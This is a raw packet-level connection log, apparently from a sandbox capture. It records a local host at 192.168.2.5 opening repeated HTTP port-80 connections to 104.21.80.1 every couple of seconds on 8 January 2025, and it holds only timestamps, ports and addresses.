Jan 8, 2025 08:45:16.514049053 CET	50011	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:16.518827915 CET	80	50011	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:17.157099009 CET	80	50011	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:17.157154083 CET	50011	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:18.664411068 CET	50011	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:18.664828062 CET	50012	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:18.669430971 CET	80	50011	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:18.669509888 CET	50011	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:18.669715881 CET	80	50012	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:18.669815063 CET	50012	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:18.669969082 CET	50012	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:18.674802065 CET	80	50012	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:19.300968885 CET	80	50012	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:19.301110029 CET	50012	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:20.931070089 CET	50012	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:20.931546926 CET	50013	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:20.936077118 CET	80	50012	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:20.936139107 CET	50012	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:20.936438084 CET	80	50013	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:20.936505079 CET	50013	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:20.936687946 CET	50013	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:20.941503048 CET	80	50013	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:21.567949057 CET	80	50013	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:21.568047047 CET	50013	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:23.071652889 CET	50013	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:23.072033882 CET	50014	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:23.077905893 CET	80	50013	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:23.077965975 CET	50013	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:23.078234911 CET	80	50014	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:23.078318119 CET	50014	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:23.078464985 CET	50014	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:23.084532022 CET	80	50014	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:23.716007948 CET	80	50014	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:23.720386028 CET	50014	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:25.790421009 CET	50014	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:25.790837049 CET	50015	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:25.796281099 CET	80	50015	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:25.796386003 CET	50015	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:25.796411991 CET	80	50014	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:25.796591043 CET	50014	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:25.796592951 CET	50015	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:25.801919937 CET	80	50015	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:26.355808020 CET	80	50015	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:26.355854034 CET	50015	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:27.868459940 CET	50015	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:27.868479967 CET	50016	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:27.873434067 CET	80	50016	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:27.873549938 CET	80	50015	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:27.873580933 CET	50016	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:27.873728037 CET	50015	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:27.873799086 CET	50016	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:27.878602028 CET	80	50016	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:28.528362989 CET	80	50016	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:28.528426886 CET	50016	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:30.149947882 CET	50016	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:30.150382996 CET	50017	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:30.155025005 CET	80	50016	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:30.155141115 CET	50016	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:30.155210018 CET	80	50017	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:30.155272007 CET	50017	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:30.155406952 CET	50017	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:30.160145998 CET	80	50017	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:30.788145065 CET	80	50017	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:30.788214922 CET	50017	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:32.305810928 CET	50017	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:32.306168079 CET	50018	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:32.408920050 CET	80	50018	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:32.408981085 CET	50018	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:32.409204006 CET	50018	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:32.409430027 CET	80	50017	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:32.409487963 CET	50017	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:32.413981915 CET	80	50018	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:33.060673952 CET	80	50018	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:33.060730934 CET	50018	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:34.680807114 CET	50018	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:34.681107998 CET	50019	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:34.685941935 CET	80	50019	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:34.686039925 CET	50019	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:34.686187029 CET	50019	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:34.686336040 CET	80	50018	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:34.686398983 CET	50018	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:34.690959930 CET	80	50019	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:35.310575962 CET	80	50019	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:35.316407919 CET	50019	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:36.821774006 CET	50019	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:36.822179079 CET	50020	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:36.826822996 CET	80	50019	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:36.826877117 CET	50019	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:36.827070951 CET	80	50020	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:36.827132940 CET	50020	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:36.827311039 CET	50020	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:36.832151890 CET	80	50020	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:37.467489004 CET	80	50020	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:37.467541933 CET	50020	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:39.183437109 CET	50020	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:39.186058998 CET	50021	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:39.188546896 CET	80	50020	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:39.188791037 CET	50020	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:39.190960884 CET	80	50021	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:39.191031933 CET	50021	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:39.191734076 CET	50021	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:39.196484089 CET	80	50021	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:39.845268011 CET	80	50021	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:39.845340967 CET	50021	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:41.356662989 CET	50021	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:41.356964111 CET	50022	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:41.361689091 CET	80	50021	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:41.361742973 CET	80	50022	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:41.361763954 CET	50021	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:41.361821890 CET	50022	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:41.364422083 CET	50022	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:41.369215965 CET	80	50022	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:42.000072002 CET	80	50022	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:42.004348993 CET	50022	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:43.727058887 CET	50022	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:43.730947018 CET	50023	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:43.732104063 CET	80	50022	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:43.734636068 CET	50022	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:43.735768080 CET	80	50023	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:43.738746881 CET	50023	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:43.744420052 CET	50023	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:43.749209881 CET	80	50023	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:44.373550892 CET	80	50023	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:44.373634100 CET	50023	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:45.883557081 CET	50024	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:45.883558989 CET	50023	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:45.888413906 CET	80	50024	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:45.888509035 CET	50024	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:45.888617992 CET	80	50023	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:45.888672113 CET	50024	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:45.888742924 CET	50023	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:45.893429995 CET	80	50024	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:46.523636103 CET	80	50024	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:46.523686886 CET	50024	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:48.152160883 CET	50024	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:48.152162075 CET	50025	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:48.159504890 CET	80	50025	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:48.159518003 CET	80	50024	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:48.159601927 CET	50025	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:48.159605026 CET	50024	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:48.159876108 CET	50025	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:48.165097952 CET	80	50025	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:48.783965111 CET	80	50025	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:48.784017086 CET	50025	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:50.292171955 CET	50025	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:50.292629004 CET	50026	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:50.297338009 CET	80	50025	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:50.297393084 CET	50025	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:50.297430038 CET	80	50026	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:50.297489882 CET	50026	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:50.301374912 CET	50026	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:50.306140900 CET	80	50026	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:50.845326900 CET	80	50026	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:50.845498085 CET	50026	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:52.571379900 CET	50026	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:52.571988106 CET	50027	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:52.576456070 CET	80	50026	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:52.576514006 CET	50026	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:52.576780081 CET	80	50027	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:52.576843977 CET	50027	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:52.577013016 CET	50027	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:52.581837893 CET	80	50027	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:53.222126007 CET	80	50027	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:53.228436947 CET	50027	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:54.728037119 CET	50027	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:54.728571892 CET	50028	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:54.733119011 CET	80	50027	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:54.733174086 CET	50027	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:54.733428001 CET	80	50028	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:54.733508110 CET	50028	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:54.733674049 CET	50028	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:54.738444090 CET	80	50028	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:55.378366947 CET	80	50028	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:55.378489971 CET	50028	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:57.009215117 CET	50028	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:57.009548903 CET	50029	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:57.014276981 CET	80	50028	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:57.014347076 CET	50028	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:57.014363050 CET	80	50029	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:57.014427900 CET	50029	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:57.014543056 CET	50029	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:57.019361973 CET	80	50029	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:57.640372038 CET	80	50029	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:57.640441895 CET	50029	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:59.211666107 CET	50029	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:59.212241888 CET	50030	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:59.216767073 CET	80	50029	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:59.216851950 CET	50029	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:59.217016935 CET	80	50030	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:59.217165947 CET	50030	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:59.392281055 CET	50030	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:45:59.397279978 CET	80	50030	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:59.761519909 CET	80	50030	104.21.80.1	192.168.2.5
Jan 8, 2025 08:45:59.767735958 CET	50030	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:01.446537971 CET	50031	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:01.446547985 CET	50030	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:01.451415062 CET	80	50031	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:01.451577902 CET	80	50030	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:01.451674938 CET	50031	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:01.451684952 CET	50030	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:01.451821089 CET	50031	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:01.456564903 CET	80	50031	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:02.098253965 CET	80	50031	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:02.099495888 CET	50031	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:03.602303028 CET	50031	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:03.602304935 CET	50032	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:03.607192993 CET	80	50032	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:03.607287884 CET	50032	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:03.607362986 CET	80	50031	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:03.607422113 CET	50031	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:03.607430935 CET	50032	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:03.612173080 CET	80	50032	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:04.269320965 CET	80	50032	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:04.269382954 CET	50032	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:05.904848099 CET	50032	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:05.905545950 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:05.909950972 CET	80	50032	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:05.910296917 CET	50032	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:05.910381079 CET	80	50033	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:05.910520077 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:05.914870977 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:05.919646978 CET	80	50033	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:06.472740889 CET	80	50033	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:06.472793102 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:06.606909990 CET	80	50033	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:06.606987953 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:08.117619991 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:08.118570089 CET	50034	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:08.122598886 CET	80	50033	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:08.123488903 CET	80	50034	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:08.126518965 CET	50033	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:08.126573086 CET	50034	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:08.130465984 CET	50034	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:08.135226965 CET	80	50034	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:08.672053099 CET	80	50034	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:08.672125101 CET	50034	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:10.310036898 CET	50034	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:10.310379982 CET	50035	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:10.316066980 CET	80	50035	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:10.316082001 CET	80	50034	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:10.316143990 CET	50035	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:10.316169977 CET	50034	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:10.316471100 CET	50035	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:10.321269989 CET	80	50035	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:10.968169928 CET	80	50035	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:10.968221903 CET	50035	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:12.479337931 CET	50035	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:12.479827881 CET	50036	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:12.484476089 CET	80	50035	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:12.484532118 CET	50035	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:12.484594107 CET	80	50036	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:12.484657049 CET	50036	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:12.484935045 CET	50036	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:12.489757061 CET	80	50036	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:13.131798029 CET	80	50036	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:13.131860018 CET	50036	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:14.857028961 CET	50036	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:14.858397007 CET	50037	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:14.862108946 CET	80	50036	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:14.862160921 CET	50036	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:14.863270044 CET	80	50037	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:14.863336086 CET	50037	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:14.873193979 CET	50037	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:14.878041029 CET	80	50037	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:15.504054070 CET	80	50037	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:15.504184008 CET	50037	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:16.584336042 CET	50037	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:16.589453936 CET	80	50037	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:16.589505911 CET	50037	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:17.026130915 CET	50038	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:17.031064034 CET	80	50038	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:17.031187057 CET	50038	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:17.031342030 CET	50038	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:17.036804914 CET	80	50038	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:17.583163023 CET	80	50038	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:17.585699081 CET	50038	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:19.321149111 CET	50038	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:19.321155071 CET	50039	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:19.326165915 CET	80	50039	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:19.326378107 CET	50039	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:19.326390028 CET	80	50038	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:19.326486111 CET	50038	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:19.326617002 CET	50039	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:19.331386089 CET	80	50039	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:19.890101910 CET	80	50039	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:19.890650034 CET	50039	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:21.399444103 CET	50039	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:21.399446964 CET	50040	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:21.404386044 CET	80	50040	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:21.404509068 CET	50040	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:21.404762030 CET	50040	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:21.404771090 CET	80	50039	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:21.404901981 CET	50039	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:21.409502983 CET	80	50040	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:21.959530115 CET	80	50040	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:21.959884882 CET	50040	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:23.735332012 CET	50041	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:23.735337973 CET	50040	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:23.740272045 CET	80	50041	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:23.740483046 CET	80	50040	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:23.740533113 CET	50041	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:23.744467020 CET	50040	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:23.746805906 CET	50041	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:23.751622915 CET	80	50041	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:24.388957977 CET	80	50041	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:24.389024973 CET	50041	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:25.899615049 CET	50041	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:25.899616957 CET	50042	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:25.904428959 CET	80	50042	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:25.904550076 CET	80	50041	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:25.904577971 CET	50042	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:25.904676914 CET	50041	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:25.904767036 CET	50042	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:25.909554005 CET	80	50042	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:26.540175915 CET	80	50042	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:26.540261030 CET	50042	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:28.196187019 CET	50042	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:28.196203947 CET	50043	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:28.201065063 CET	80	50043	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:28.201179981 CET	50043	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:28.201215982 CET	80	50042	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:28.201361895 CET	50042	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:28.201379061 CET	50043	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:28.206132889 CET	80	50043	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:28.848458052 CET	80	50043	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:28.848552942 CET	50043	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:30.354324102 CET	50043	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:30.354751110 CET	50044	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:30.359692097 CET	80	50043	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:30.359709024 CET	80	50044	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:30.359755993 CET	50043	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:30.359817028 CET	50044	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:30.360249996 CET	50044	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:30.365036011 CET	80	50044	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:31.007652998 CET	80	50044	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:31.007709026 CET	50044	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:32.723443031 CET	50044	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:32.723893881 CET	50045	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:46:32.728610992 CET	80	50044	104.21.80.1	192.168.2.5
Jan 8, 2025 08:46:32.728657961 CET	50044	80	192.168.2.5	104.21.80.1
